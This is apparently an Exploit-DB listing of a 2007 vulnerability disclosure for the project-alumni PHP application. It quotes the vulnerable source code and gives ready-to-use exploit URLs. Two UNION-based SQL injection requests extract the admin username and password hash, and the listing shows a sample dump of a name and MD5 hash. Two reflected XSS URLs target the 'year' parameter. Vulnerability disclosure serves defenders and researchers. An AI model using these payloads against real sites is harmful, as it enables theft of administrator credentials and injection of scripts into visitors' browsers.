header-logo
Suggest Exploit
vendor:
project-alumni
by:
tomplixsee
N/A
CVSS
MEDIUM
sql injection & xss
89
CWE
Product Name: project-alumni
Affected Version From: 1.0.9
Affected Version To: 1.0.8
Patch Exists: NO
Related CWE:
CPE: project-alumni
Metasploit:
Other Scripts:
Platforms Tested:
Unknown

project-alumni sql injection & xss

The project-alumni software version 1.0.9, 1.0.8, or lower is affected by a sql injection vulnerability. The vulnerability exists due to bad filtering in the 'view.page.inc.php' and 'news.page.inc.php' files. An attacker can exploit this vulnerability by injecting malicious SQL queries through the 'year' parameter, which can lead to unauthorized access to the database. Another vulnerability is an xss vulnerability in the '/xml/index.php' file, which can be exploited by injecting malicious scripts through the 'year' parameter.

Mitigation:

To mitigate the sql injection vulnerability, it is recommended to properly filter and sanitize user input before using it in SQL queries. Additionally, enabling magic_quotes_gpc can provide some level of protection. To mitigate the xss vulnerability, it is recommended to properly filter and sanitize user input before displaying it on web pages, and to use output encoding to prevent script injection.
Source

Exploit-DB raw data:

project-alumni sql injection & xss
author : tomplixsee 
tomplixsee@yahoo.co.id

-------------------------------------------------------------------------------------------------------------
affected software version	: project alumni v1.0.9, v1.0.8, or lower??
download			: https://sourceforge.net/projects/project-alumni/


vulnerability
=============

1.sql injection
++++++++++++++++
condition: magic_quotes_gpc = off

vulnerable code on view.page.inc.php: 
$result = dbQuery("SELECT * FROM `".getConfigVal("sqlTablePrefix",2)."_users` WHERE `alumniYear` = '".$_GET['year']."'"); 

reason: bad filtering
exploit:
http://victim/path/index.php?act=view&year=2003' union select 1,1,1,alumniUserName,1,alumniPassword,1,1,1,1,1,1,1,1,1,1,1,1,1 from alumni_users where ID='1 

result example:
+---------------------------------------------------------------------------------------------------+------------------------------------------+
 |	Name   					 	|	Email		 |				 
+---------------------------------------------------------------------------------------------------+------------------------------------------+
 |	tomplixsee (1) f25a2fc72690b780b2a14e140ef6a9e0	|	Not Available              |
+------------------------------------------------------------------------------------------------ --+------------------------------------------+
tomplixsee is admin's username and f25a2fc72690b780b2a14e140ef6a9e0 is md5 encrypt from admin's password.


vulnerable code on news.page.inc.php
$result = dbQuery("SELECT * FROM `".getConfigVal("sqlTablePrefix",2)."_class_news` WHERE `year` = '".$_GET['year']."'");

reason: bad filtering
exploit:
http://victim/path/index.php?act=news&year=2003' union select 1,2,3,4,5,6,alumniPassword,8,9 from alumni_users where ID='1

2.xss
++++++
vulnerable code:

________________________________________________________________________________
#/xml/index.php									#
#										#
#	<?php 									#
#	if(isset($_GET["year"])){						#
#		$year = $_GET["year"];						#
#	}									#
#	if($year=='FRND')							#
#		$yearText = "Friends of ".getConfigVal("schoolAbbr",2)." Alumni";		#
#	else									#
#		$yearText = "Class of $year";					#
#	?>									#
#	.....									#
#	<?php echo"$yearText";?>						#
#	.....									#
#										#
#exploit:									#
#http://victim/path/xml/index.php?year=<xss>					#
#_______________________________________________________________________________#
# view.page.inc.php								#
#										#
#	<?php if(!$_GET['year']) { ?>						#
#	....									#
#	<?php } else if ($_GET['year'] < getConfigVal("alumniStartYear",2)) { ?>#
#	....									#
#	<?php } else { ?>							#
#	<h2>Alumni for the Graduating Year of <?php echo $_GET['year'] ?></h2>	#
#										#
#exploit									#
#http://victim/path/index.php?act=view&year=<xss>				#
#_______________________________________________________________________________#


salam untuk:
anak-anak jaringan sukabirus, teman-teman di stt telkom, komunitas jasakom, 
sibalbal, crutz_ao, bidulux, akillers 179...........

# milw0rm.com [2007-11-24]